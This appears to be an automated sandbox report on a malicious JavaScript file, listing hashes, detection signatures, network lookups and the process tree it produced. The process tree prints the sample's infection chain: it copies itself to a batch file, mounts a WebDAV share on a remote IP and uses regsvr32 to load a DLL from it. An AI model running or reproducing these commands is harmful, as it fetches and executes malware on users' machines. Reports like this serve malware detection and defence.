Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/07/2024, 15:43 UTC

General

  • Target

    2419917728311676320.js

  • Size

    5KB

  • MD5

    803773aeb4ffb459d09abdb44d050c75

  • SHA1

    1ae0d3388bcf5f507c474da66e28398bd1b3ae73

  • SHA256

    f4dc317e00002ec2675c347bdf4f48c67971484b30b1b13dfa08ac1a594d0556

  • SHA512

    7ade6c959004fff0f4969106c5d7c09f181e2ddded2ad7fcc69226f9491913838990ec32606fab7bc72ea44cb6ed7eac2ba4610c3bf9435f423d4d80515303c9

  • SSDEEP

    96:lL87fjdy4ykX5Gz/YB1lBSciTf5meO0iRZeSkye5:W7fJy4TX5q/YB1lBSciTf5m/0iRZDkyG

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\2419917728311676320.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3180
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2419917728311676320.js" "C:\Users\Admin\\eugmlm.bat" && "C:\Users\Admin\\eugmlm.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\system32\net.exe
        net use \\45.9.74.13@8888\DavWWWRoot\
        3⤵
          PID:3604
        • C:\Windows\system32\regsvr32.exe
          regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\229.dll
          3⤵
            PID:2444

      Network

      • flag-us
        DNS
        75.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        75.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        157.123.68.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        157.123.68.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.31.95.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.31.95.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        232.135.221.88.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        232.135.221.88.in-addr.arpa
        IN PTR
        Response
        232.135.221.88.in-addr.arpa
        IN PTR
        a88-221-135-232deploystaticakamaitechnologiescom
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        63.141.182.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        63.141.182.52.in-addr.arpa
        IN PTR
        Response
      No results found
      • 8.8.8.8:53
        75.159.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        75.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        157.123.68.40.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        157.123.68.40.in-addr.arpa

      • 8.8.8.8:53
        18.31.95.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        18.31.95.13.in-addr.arpa

      • 8.8.8.8:53
        232.135.221.88.in-addr.arpa
        dns
        73 B
        139 B
        1
        1

        DNS Request

        232.135.221.88.in-addr.arpa

      • 8.8.8.8:53
        172.210.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.210.232.199.in-addr.arpa

      • 8.8.8.8:53
        63.141.182.52.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        63.141.182.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\eugmlm.bat

        Filesize

        5KB

        MD5

        803773aeb4ffb459d09abdb44d050c75

        SHA1

        1ae0d3388bcf5f507c474da66e28398bd1b3ae73

        SHA256

        f4dc317e00002ec2675c347bdf4f48c67971484b30b1b13dfa08ac1a594d0556

        SHA512

        7ade6c959004fff0f4969106c5d7c09f181e2ddded2ad7fcc69226f9491913838990ec32606fab7bc72ea44cb6ed7eac2ba4610c3bf9435f423d4d80515303c9

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.